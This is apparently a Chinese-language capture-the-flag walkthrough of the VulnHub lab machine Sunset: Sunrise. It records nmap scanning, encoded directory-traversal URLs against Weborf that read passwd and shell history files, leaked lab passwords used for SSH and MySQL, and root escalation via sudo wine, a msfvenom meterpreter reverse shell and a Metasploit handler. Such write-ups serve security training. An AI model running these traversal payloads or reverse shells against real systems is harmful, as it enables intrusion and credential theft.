PJzhang:vulnhub靶机sunset系列SUNSET:SUNRISE
猫宁~~~
地址:http://www.vulnhub.com/entry/sunset-sunrise,406/
关注工具和思路。
nmap 192.168.43.0/24
靶机IP
192.168.43.11
nmap -A -p1-65535 192.168.43.11
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
80/tcp open http nginx 1.14.2
3306/tcp open mysql
8080/tcp open http-proxy http-proxy Weborf (GNU/Linux)
http://192.168.43.11/
http://192.168.43.11:8080/,获知Weborf/0.12.2 (GNU/Linux)
Weborf/0.12.2存在目录遍历漏洞
https://www.exploit-db.com/exploits/14925
查看用户列表
http://192.168.43.11:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
关注
sunrise:x:1000:1000:sunrise,,,:/home/sunrise:/bin/bash
weborf:x:1001:1001:,,,:/home/weborf:/bin/bash
查看家目录,正好是上述两个用户
http://192.168.43.11:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2f
dirb http://192.168.43.11:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf
如下可以访问
http://192.168.43.11:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf/.profile
http://192.168.43.11:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf/.mysql_history
显示ALTER USER 'weborf'@'localhost' IDENTIFIED BY 'iheartrainbows44';
http://192.168.43.11:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf/.bashrc
ssh weborf@192.168.43.11,输入iheartrainbows44,进入
uname -a
Linux sunrise 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64 GNU/Linux
mysql -uweborf -p,密码还是iheartrainbows44
show databases;
use mysql;
show tables;
select Host,User,Password from user;
localhost | sunrise | thefutureissobrightigottawearshades
su sunrise,输入密码thefutureissobrightigottawearshades,sunrise@sunrise:/home/weborf$
sudo -l
获知(root) /usr/bin/wine
提权信息收集程序
https://github.com/sleventyeleven/linuxprivchecker
msfvenom -p windows/meterpreter/reverse_tcp -f exe --platform windows -a x86 -e generic/none lhost=192.168.43.154 lport=4444 >muma.exe
python3 -m http.server 80
进入靶机
wget http://192.168.43.154/muma.exe
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.43.154
set lport 4444
run
sudo /usr/bin/wine muma.exe
密码thefutureissobrightigottawearshades
直接获取shell
meterpreter >
cd /root
cat.root.txt
24edb59d21c273c033aa6f1689b0b18c
或者直接在靶机执行sudo /usr/bin/wine cmd.exe
cd /root
type root.txt
24edb59d21c273c033aa6f1689b0b18c